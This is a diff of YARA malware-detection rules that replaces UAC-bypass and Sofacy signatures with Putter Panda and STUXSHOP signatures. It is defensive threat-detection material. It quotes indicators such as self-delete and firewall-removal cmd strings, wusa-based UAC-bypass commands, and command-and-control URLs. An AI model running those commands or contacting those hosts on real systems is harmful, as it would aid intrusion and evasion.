+		$s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+		$s3 = "Internet connect error:%d" fullword ascii
+		$s4 = "Proxy-Authorization:Basic" fullword ascii
+		$s5 = "HttpQueryInfo failed:%d" fullword ascii
+		$s6 = "read file error:%d" fullword ascii
+		$s7 = "downdll.dll" fullword ascii
+		$s8 = "rz.dat" fullword ascii
+		$s9 = "Invalid url" fullword ascii
+		$s10 = "Create file failed" fullword ascii
+		$s11 = "myAgent" fullword ascii
+		$s12 = "%s%s%d%d" fullword ascii
+		$s13 = "down file success" fullword ascii
+		$s15 = "error!" fullword ascii
+		$s18 = "Avaliable data:%u bytes" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "KlpSvc" ) or ( 1 of ( $x* ) or 4 of them ) or ( $s1 and all of ( $g* ) ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule SIGNATURE_BASE_Sofacy_Oct17_2 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_PSAPI : FILE
 {
 	meta:
-		description = "Detects Sofacy malware reported in October 2017"
+		description = "Detects a malware related to Putter Panda"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c820eab0-9b64-5718-8681-a4f515ee462b"
-		date = "2017-10-23"
+		id = "e074ab8a-2ca4-579e-aaef-cdfb9c64b21b"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_oct17_camp.yar#L49-L71"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L61-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c2736cf9efbb022590f4c23986531e645ac412a5b98a950b143f2d75a33e8063"
-		score = 75
+		hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
+		logic_hash = "b73f1db2ca8a3164562314ebd9903c864eb2690c95731959df0e99656544ed40"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18"
 
 	strings:
-		$x1 = "netwf.dll" fullword wide
-		$s1 = "%s - %s - %2.2x" fullword wide
-		$s2 = "%s - %lu" fullword ascii
-		$s3 = "%s \"%s\", %s" fullword wide
-		$s4 = "%j%Xjsf" fullword ascii
+		$s0 = "LOADER ERROR" fullword ascii
+		$s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s2 = "psapi.dll" fullword ascii
+		$s3 = "urlmon.dll" fullword ascii
+		$s4 = "WinHttpGetProxyForUrl" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "13344e2a717849489bcd93692f9646f7" or ( 4 of them ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Win7Elevatev2 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_WUAUCLT
 {
 	meta:
-		description = "Detects Win7Elevate - Windows UAC bypass utility"
+		description = "Detects a malware related to Putter Panda"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af092d16-ca95-5985-822a-50457c9cbcc9"
-		date = "2015-05-14"
+		id = "5c8e0629-b5f2-5933-8c74-c49b756aaf18"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L2-L33"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L81-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2f5859388c6074f1a75f0c40387f30ffa50d6b87f20f518fd1af7398c95cd650"
-		score = 60
+		hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
+		logic_hash = "49cae3b727d6b2673dc9a6497d59c9abdd78d486e1eaf6f036f6eb1aef9a8fcb"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29"
-		hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1"
 
 	strings:
-		$x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
-		$x2 = "Win7ElevateV2\\x64\\Release\\" ascii
-		$x3 = "Run the command normally (without code injection)" wide
-		$x4 = "Inject file copy && elevate command" fullword wide
-		$x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
-		$x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
-		$s1 = "\\cmd.exe" wide
-		$s2 = "runas" wide
-		$s3 = "explorer.exe" wide
-		$s4 = "Couldn't load kernel32.dll" wide
-		$s5 = "CRYPTBASE.dll" wide
-		$s6 = "shell32.dll" wide
-		$s7 = "ShellExecuteEx" ascii
-		$s8 = "COMCTL32.dll" ascii
-		$s9 = "ShellExecuteEx" ascii
-		$s10 = "HeapAlloc" ascii
+		$x0 = "WUAUCLT.EXE" fullword wide
+		$x1 = "%s\\tmp%d.exe" fullword ascii
+		$x2 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s1 = "Microsoft Windows Operating System" fullword wide
+		$s2 = "InternetQueryOptionA" fullword ascii
+		$s3 = "LookupPrivilegeValueA" fullword ascii
+		$s4 = "WNetEnumResourceA" fullword ascii
+		$s5 = "HttpSendRequestExA" fullword ascii
+		$s6 = "PSAPI.DLL" fullword ascii
+		$s7 = "Microsoft(R) Windows(R) Operating System" fullword wide
+		$s8 = "CreatePipe" fullword ascii
+		$s9 = "EnumProcessModules" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
+		all of ( $x* ) or ( 1 of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_UACME_Akagi
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen1 : FILE
 {
 	meta:
-		description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7979129e-99a3-522a-8285-9061e1e2bd41"
-		date = "2015-05-14"
+		description = "Detects a malware "
+		author = "YarGen Rule Generator"
+		id = "5e7910e7-3f33-50fb-a87f-bf0bbf8a2797"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/UACME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L35-L64"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L110-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e10f39837a53dcc6d301d21a69fca965aeca0a07cfc832a9a0142b08d280f955"
-		score = 60
+		logic_hash = "8054195f212017fb17953728a7df34645d81c93fee75300e44f467c6aa5efaff"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
-		hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
+		tags = "FILE"
+		super_rule = 1
+		hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
+		hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
+		hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
 
 	strings:
-		$x1 = "UACMe injected, Fubuki at your service." wide fullword
-		$x3 = "%temp%\\Hibiki.dll" fullword wide
-		$x4 = "[UCM] Cannot write to the target process memory." fullword wide
-		$s1 = "%systemroot%\\system32\\cmd.exe" wide
-		$s2 = "D:(A;;GA;;;WD)" wide
-		$s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
-		$s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
-		$s5 = "Fubuki.dll" ascii fullword
-		$l1 = "ntdll.dll" ascii
-		$l2 = "Cabinet.dll" ascii
-		$l3 = "GetProcessHeap" ascii
-		$l4 = "WriteProcessMemory" ascii
-		$l5 = "ShellExecuteEx" ascii
+		$s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii
+		$s2 = "ssdpsvc.dll" fullword ascii
+		$s3 = "Fail %s " fullword ascii
+		$s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii
+		$s5 = "LsaServiceInit" fullword ascii
+		$s6 = "%-8d Fs %-12s Bs " fullword ascii
+		$s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii
 
 	condition:
-		(1 of ( $x* ) ) or ( 3 of ( $s* ) and all of ( $l* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
 }
-rule SIGNATURE_BASE_Uacelevator : FILE
+rule SIGNATURE_BASE_Malware_Msupdater_String_In_EXE : FILE
 {
 	meta:
-		description = "UACElevator bypassing UAC - file UACElevator.exe"
+		description = "MSUpdater String in Executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "629b1a92-726d-5713-ae3d-74cc8a1e52ad"
-		date = "2015-05-14"
+		id = "c7da9e1e-3a8d-54b6-b102-0e1095d99cc4"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/MalwareTech/UACElevator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L66-L90"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L133-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
-		logic_hash = "8215746b2c84a5500221580969fb2eac8ee11cbb5af4ba5bf2dbd1def65b8745"
-		score = 75
+		hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
+		logic_hash = "2b7a43aee6dbac1bfa7d9e0331cb078394ae78a1ec44c1a4a70a63b38595abe0"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\UACElevator.pdb" ascii
-		$s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
-		$s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
-		$s3 = "Infection module: %s" fullword ascii
-		$s4 = "Could not save module to %s" fullword ascii
-		$s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
-		$s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
-		$s7 = "Stack around the variable '" fullword ascii
-		$s8 = "MSVCR120D.dll" fullword wide
-		$s9 = "Address: 0x" fullword ascii
+		$x1 = "msupdate.exe" fullword wide
+		$x3 = "msupdater.exe" fullword ascii
+		$x4 = "msupdater32.exe" fullword ascii
+		$x5 = "msupdater32.exe" fullword wide
+		$x6 = "msupdate.pif" fullword ascii
+		$fp1 = "_msupdate_" wide
+		$fp2 = "_msupdate_" ascii
+		$fp3 = "/kies" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) ) and not ( 1 of ( $fp* ) )
 }
-rule SIGNATURE_BASE_S4U : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_3 : FILE
 {
 	meta:
-		description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d746311-56fe-538c-946c-3a3dd1603adc"
-		date = "2015-06-05"
+		id = "917ab081-ee91-5eda-82eb-4731563a1933"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/aurel26/s-4-u-for-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L92-L139"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L158-L175"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
-		logic_hash = "b1882710f2514fb44ff01631636c0a66beef620c8bea644ebe05cd5385a9e494"
-		score = 50
-		quality = 83
+		hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
+		logic_hash = "09e7da7f2bfbae9252502ea1ea61b612c1af2e4c70508b34e685b46429d4613c"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii
-		$x1 = "\\Release\\s4u.pdb" ascii
-		$s0 = "CreateProcessAsUser failed (error %u)." fullword ascii
-		$s1 = "GetTokenInformation failed (error: %u)." fullword ascii
-		$s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii
-		$s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii
-		$s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii
-		$s5 = "The token does not have the specified privilege (%S)." fullword ascii
-		$s6 = "Unable to parse command line." fullword ascii
-		$s7 = "Unable to find logon SID." fullword ascii
-		$s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
-		$s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii
-		$g1 = "%systemroot%\\system32\\cmd.exe" wide
-		$g2 = "SeTcbPrivilege" wide
-		$g3 = "winsta0\\default" wide
-		$g4 = ".rsrc"
-		$g5 = "HeapAlloc"
-		$g6 = "GetCurrentProcess"
-		$g7 = "HeapFree"
-		$g8 = "GetProcessHeap"
-		$g9 = "ExpandEnvironmentStrings"
-		$g10 = "ConvertStringSidToSid"
-		$g11 = "LookupPrivilegeValue"
-		$g12 = "AllocateLocallyUniqueId"
-		$g13 = "ADVAPI32.dll"
-		$g14 = "LsaLookupAuthenticationPackage"
-		$g15 = "Secur32.dll"
-		$g16 = "MSVCR120.dll"
+		$s0 = "msupdater.exe" fullword ascii
+		$s1 = "Explorer.exe \"" fullword ascii
+		$s2 = "FAVORITES.DAT" fullword ascii
+		$s4 = "COMSPEC" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $g* ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule SIGNATURE_BASE_UACME_Akagi_2 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_1 : FILE
 {
 	meta:
-		description = "Detects Windows User Account Control Bypass - from files Akagi32.exe, Akagi64.exe"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1177d663-1081-5d17-9dd7-1218d95d90f7"
-		date = "2017-02-03"
+		id = "3c65b668-52c2-5cd5-ba02-4f190e08d46c"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/UACME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L151-L174"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L177-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f79a82d466f51c86a0e6fb89688708c35dbcc7ba8f4543e5fb7565d41dd3faab"
-		score = 80
+		hash = "b55072b67543f58c096571c841a560c53d72f01a"
+		logic_hash = "038be28609df0187cbbce0d16fee7c902b742458f1201ff3c0d5fde19acd2c56"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca"
-		hash2 = "609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5"
 
 	strings:
-		$x1 = "Usage: Akagi.exe [Method] [OptionalParamToExecute]" fullword wide
-		$x2 = "[UCM] Target file already exists, abort" fullword wide
-		$s1 = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword wide
-		$s2 = "Akagi.exe" fullword wide
-		$s3 = "Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" fullword wide
-		$s4 = "/c wusa %ws /extract:%%windir%%\\system32\\sysprep" fullword wide
-		$s5 = "/c wusa %ws /extract:%%windir%%\\system32\\migwiz" fullword wide
-		$s6 = "loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"" fullword ascii
+		$x0 = "msupdate.exe" fullword wide
+		$x1 = "msupdate" fullword wide
+		$s1 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s2 = "Automatic Updates" fullword wide
+		$s3 = "VirtualProtectEx" fullword ascii
+		$s4 = "Invalid parameter" fullword ascii
+		$s5 = "VirtualAllocEx" fullword ascii
+		$s6 = "WriteProcessMemory" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) and 4 of ( $s* ) ) or ( 1 of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_EXPL_Zoho_RCE_Fix_Lines_Dec21_1 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_2 : FILE
 {
 	meta:
-		description = "Detects lines in log lines of Zoho products that indicate RCE fixes (silent removal of evidence)"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "633287e3-a377-5b3c-8520-a7790168eff5"
-		date = "2021-12-06"
+		id = "e9188a14-5c0c-551c-bdca-9f770f42935a"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1467784104930385923"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_zoho_rcef_logs.yar#L2-L27"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L202-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e6d9c3364da57c03a5e838f485deefabec2f3ec67d19a9017e564ba702a72d03"
-		score = 65
-		quality = 85
+		hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
+		logic_hash = "47d75e589d47a39d5a9c9e0047a143074d3d74b5541adf8cb3be968da732a96d"
+		score = 70
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "RCEF="
-		$sa1 = "\"attackStatus\"\\:\"active\""
-		$sa2 = "\"attackStatus\":\"active\""
-		$sd1 = "deletedCount"
-		$sd_fp1 = "\"deletedCount\"\\:0"
-		$sd_fp2 = "\"deletedCount\":0"
+		$s0 = "winsta0\\default" fullword ascii
+		$s1 = "EXPLORER.EXE" fullword ascii
+		$s2 = "WNetEnumResourceA" fullword ascii
+		$s3 = "explorer.exe" fullword ascii
+		$s4 = "CreateProcessAsUserA" fullword ascii
+		$s5 = "HttpSendRequestExA" fullword ascii
+		$s6 = "HttpEndRequestA" fullword ascii
+		$s7 = "GetModuleBaseNameA" fullword ascii
+		$s8 = "GetModuleFileNameExA" fullword ascii
+		$s9 = "HttpSendRequestA" fullword ascii
+		$s10 = "HttpOpenRequestA" fullword ascii
+		$s11 = "InternetConnectA" fullword ascii
+		$s12 = "Process32Next" fullword ascii
+		$s13 = "Process32First" fullword ascii
+		$s14 = "CreatePipe" fullword ascii
+		$s15 = "EnumProcesses" fullword ascii
+		$s16 = "LookupPrivilegeValueA" fullword ascii
+		$s17 = "PeekNamedPipe" fullword ascii
+		$s18 = "EnumProcessModules" fullword ascii
+		$s19 = "PSAPI.DLL" fullword ascii
+		$s20 = "SPSSSQ" fullword ascii
 
 	condition:
-		filesize < 6MB and $s1 and ( 1 of ( $sa* ) or ( $sd1 and not 1 of ( $sd_fp* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Gobfuscate_May21 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen4 : FILE
 {
 	meta:
-		description = "Identifies binaries obfuscated with gobfuscate"
-		author = "James Quinn, Paul Hager (merged with new similar pattern)"
-		id = "ae518296-b1c3-568c-bae0-3e0a6f7600ba"
-		date = "2021-05-14"
-		modified = "2024-04-02"
-		reference = "https://github.com/unixpickle/gobfuscate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gobfuscate.yar#L2-L18"
+		description = "Detects Malware related to PutterPanda"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b6ce725-6932-5432-acd5-ee3593ac7bd8"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L238-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f71078dd6354a482a2ead2f0d25f4172cd40e62440a70c2da7916b68f26909a3"
+		logic_hash = "7d450935febe5d6db14be1e7694db1d7b9e8fcacf013920e89c7b25659254310"
 		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
+		hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
+		hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
+		hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
+		hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
 
 	strings:
-		$s1 = { 0F B6 ?? ?? ?? 0F B6 ?? ?? ?? 31 D? [0-1] 88 ?? ?? ?? 48 FF C? 48 83 F? ?? 7C E6 48 }
-		$s2 = { 0F B6 ?? ?? ?? 31 DA 88 ?? ?? ?? 40 83 ?? ?? 7D 09 0F B6 }
+		$x1 = "rz.dat" fullword ascii
+		$s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+		$s1 = "Internet connect error:%d" fullword ascii
+		$s2 = "Proxy-Authorization:Basic " fullword ascii
+		$s5 = "Invalid url" fullword ascii
+		$s6 = "Create file failed" fullword ascii
+		$s7 = "myAgent" fullword ascii
+		$z1 = "%s%s%d%d" fullword ascii
+		$z2 = "HttpQueryInfo failed:%d" fullword ascii
+		$z3 = "read file error:%d" fullword ascii
+		$z4 = "down file success" fullword ascii
+		$z5 = "kPStoreCreateInstance" fullword ascii
+		$z6 = "Avaliable data:%u bytes" fullword ascii
+		$z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
 
 	condition:
-		filesize < 50MB and any of them
+		filesize < 300KB and ( ( uint16( 0 ) == 0x5a4d and $x1 and 3 of ( $s* ) ) or ( 3 of ( $s* ) and 4 of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_Malware_QA_Not_Copy : FILE
+rule SIGNATURE_BASE_STUXSHOP_Config
 {
 	meta:
-		description = "VT Research QA uploaded malware - file not copy.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d618389b-ec80-5ad1-be44-4b1f3e36c07d"
-		date = "2016-08-29"
+		description = "Stuxshop standalone sample configuration"
+		author = "JAG-S (turla@chronicle.security)"
+		id = "67367db5-51b3-5177-960a-5b06161154e2"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L13-L37"
+		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxshop.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4001d71101a9c6d4134e7ed4b9b03d34ada62241a668970e21a60d7a23dd7b86"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1410f38498567b64a4b984c69fe4f2859421e4ac598b9750d8f703f1d209f836"
+		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
+		logic_hash = "9dd57f8b4e25a53dcf54dc75a1bb26675c7dd04dbb4d96286bcc0a6527a21782"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = "U2VydmVyLmV4ZQ==" fullword wide
-		$x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii
-		$x3 = "fuckyou888.ddns.net" fullword wide
-		$s1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
-		$s2 = "Server.exe" fullword wide
-		$s3 = "Execute ERROR" fullword wide
-		$s4 = "not copy.exe" fullword wide
-		$s5 = "Non HosT" fullword wide
-		$s6 = "netsh firewall delete allowedprogram" fullword wide
+		$cnc1 = "http://211.24.237.226/index.php?data=" ascii wide
+		$cnc2 = "http://todaysfutbol.com/index.php?data=" ascii wide
+		$cnc3 = "http://78.111.169.146/index.php?data=" ascii wide
+		$cnc4 = "http://mypremierfutbol.com/index.php?data=" ascii wide
+		$regkey1 = "Software\\Microsoft\\Windows\\CurrentVersion\\MS-DOS Emulation" ascii wide
+		$regkey2 = "NTVDMParams" ascii wide
+		$flowerOverlap1 = { 85 C0 75 3B 57 FF 75 1C FF 75 18 FF 75 14 50 FF 75 10 FF 75 FC FF 15 }
+		$flowerOverlap2 = { 85 C0 75 4C 8B 45 1C 89 45 0C 8D 45 0C 50 8D 45 08 FF 75 18 50 6A 00 FF 75 10 FF 75 20 FF 15 }
+		$flowerOverlap3 = { 55 8B EC 53 56 8B 75 20 85 F6 74 03 83 26 00 8D 45 20 50 68 19 00 02 00 6A 00 FF 75 0C FF 75 08 }
+		$flowerOverlap4 = { 55 8B EC 51 8D 4D FC 33 C0 51 50 6A 26 50 89 45 FC FF 15 }
+		$flowerOverlap5 = { 85 DB 74 04 8B C3 EB 1A 8B 45 08 3B 45 14 74 07 B8 5D 06 00 00 EB 0B 85 F6 74 05 8B 45 0C 89 06 }
+		$flowerOverlap6 = { 85 FF 74 12 83 7D F8 01 75 0C FF 75 0C FF 75 08 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+		all of ( $flowerOverlap* ) or 2 of ( $cnc* ) or all of ( $regkey* )
 }
-rule SIGNATURE_BASE_Malware_QA_Update : FILE
+rule SIGNATURE_BASE_STUXSHOP_Oscheck
 {
 	meta:
-		description = "VT Research QA uploaded malware - file update.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1dce684d-33b0-5588-8325-2a34c0cde32f"
-		date = "2016-08-29"
+		description = "Identifies the OS Check function in STUXSHOP and CheshireCat"
+		author = "Silas Cutler (havex@Chronicle.Security)"
+		id = "24fb5c6f-d5ab-5f17-942c-b712e2c017d4"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L39-L69"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxshop.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
